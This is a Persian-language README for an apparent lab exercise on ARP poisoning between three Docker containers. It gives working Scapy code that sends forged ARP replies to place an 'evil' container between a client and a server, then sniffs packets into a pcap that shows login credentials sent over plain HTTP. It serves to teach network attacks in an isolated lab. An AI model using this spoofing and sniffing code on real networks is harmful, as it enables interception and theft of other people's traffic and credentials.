# تمرین arp poisoning

### سناریو

در این پروژه ما 3 دیواس server , client , evil داریم.

> + روی پورت 5000 server یک سرور http ران است که یک اندپوینت login دارد که با دریافت نام کاربری و پسورد صحیح بودن آن را چک میکنم
> 
> + کانتینر client یک کاربر هست که میخواد با سرور با استفاده از curl ارتباط بگیرد
> 
> + کانتینر evil یک هکر هست که میخواد داده های رد بد شده بین server و client را بدزدد

### مرحله 1 (ساختن کانتینر ها)
برای حل این تمرین به 3 تا دیوایس نیاز داریم :

```sh
docker build server/ -t server
docker build client/ -t client
docker build evil/ -t evil

docker run --name server -d -p 5000:5000 server
```

سپس 3 ترمینال باز میکنیم 

در ترمینال یک دستور `docker exec -it server /bin/sh` را برای اتصال به کانیتر سرور ران میکنیم

در ترمینال دو دستور `docker run --name client -it --entrypoint /bin/sh client` را برای اتصال به کانتینر کلاینت ران میکنیم

در ترمینال سه دستور ` docker run --name evil -v "$(pwd)":/app/ -it --entrypoint /bin/sh evil` را برای اتصال به کانتینر اویل ران میکنیم

سپس با دستور ifconfig در روی تمامی کانتینر ها آدرس ip , mac هرکدام را یاداشت میکنیم.

در سیستم ما اینگونه است

1. server = ip : 172.17.0.2 , mac : 02:42:ac:11:00:02
2. client = ip : 172.17.0.3 , mac : 02:42:ac:11:00:03
3. evil   = ip : 172.17.0.4 , mac : 02:42:ac:11:00:04

داخل کانتینر اویل دستورات زیر را ران میکنیم

### مرحله 2 (arp poisoning)

```sh
sysctl -w net.inet.ip.forwarding=1
python
```
در اینجا وارد شل پایتون شده ایم و دستورات زیر را ران میکنیم

```python
from scapy.all import *
import time
server_ip = '172.17.0.2'
server_mac = '02:42:ac:11:00:02'
client_ip = '172.17.0.3'
client_mac = '02:42:ac:11:00:03'
while True:
    send(ARP(op=2, pdst=server_ip, hwdst=server_mac, psrc=client_ip))
    send(ARP(op=2, pdst=client_ip, hwdst=client_mac, psrc=server_ip))
    time.sleep(2)
```

### مرحله 3 (sniffing)

در اینجا اویل شروع به arp poisoning میکند سپس برای sniff کردن پکت ها یک ترمینال دیگه باز میکنیم و با دستور `docker exec -it evil python` دوباره به شل پایتون اویل متصل میشویم و دستورات زیر را اجرا میکنیم.


```python
from scapy.all import *
sniff_filter = "ip host 172.17.0.3"
packets = sniff(filter=sniff_filter, iface='eth0', count=100)
wrpcap("capture.pcap", packets)
```

### مرحله 4 (رد و بدل داده بین سرور و کلاینت)

سپس داخل ترمینال کلاینت که در مرحله 1 اجرا کرده بودیم با دستورات زیر شروع به ارتباط با سرور میکنیم

```sh
curl "http://172.17.0.2:5000/login/?username=user&password=pass"
curl "http://172.17.0.2:5000/login/?username=user&password=pass2"
```

### مرحله 5 (پایان)

منتظر میشویم که تعداد 100 پکت رد و بدل شود و ترمینال دوم اویل که در حال sniff کردن هست کارش تمام شود.
وقتی که کار ترمینال دوم اویل تمام شد ترمینال یک فایل pcap ذخیره میکند.

فایل را با وایرشارک باز میکنیم و فیلتر http را اعمال میکنیم تصویر زیر مشاهده میشود.


![pcap.png](./pcap.png)

همانطور که داخل عکس قابل مشاهده است ما پکت هایی که بین سرور و کلایت رد بدل شده است رو دریافت کرده ایم
